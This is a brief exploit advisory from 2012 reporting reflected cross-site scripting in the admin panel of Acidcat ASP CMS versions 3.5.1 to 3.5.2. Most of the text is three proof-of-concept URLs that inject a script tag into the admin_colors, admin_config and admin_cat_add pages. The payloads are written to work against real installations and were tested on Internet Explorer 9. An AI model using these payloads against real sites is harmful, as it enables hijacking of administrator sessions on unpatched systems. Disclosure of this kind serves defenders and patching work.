Acidcat ASP CMS versions 3.5.1 and 3.5.2 suffer from multiple cross site scripting vulnerabilities.
d83dbc616c5f99929bca4b8bb2acedbe78f10816c081b3a5f0d0ec9d8f6ca014
###############################################################################################################
# Exploit Title: Acidcat ASP CMS v 3.5.1 - 3.5.2 Admin Panel - Reflected Cros Site-Scripting ( XSS )
# Script Page : http://www.acidcat.com
# Date: 20-01-2012
# Author : RandomStorm - http://www.randomstorm.com
# Avram Marius Gabriel (d3v1l)
# Tested on: Windows XP & Vista (IE9)
###############################################################################################################
# Cross-Site Scripting (XSS)
# POC:
# http://www.site.com/admin/admin_colors.asp?"><script>alert('XSS')</script>
# http://www.site.com/admin/admin_config.asp?"><script>alert('XSS')</script>
# http://www.site.com/admin/admin_cat_add.asp?"><script>alert('XSS')</script>
################################################################################################################
# Works on Internet Explorer v.9
################################################################################################################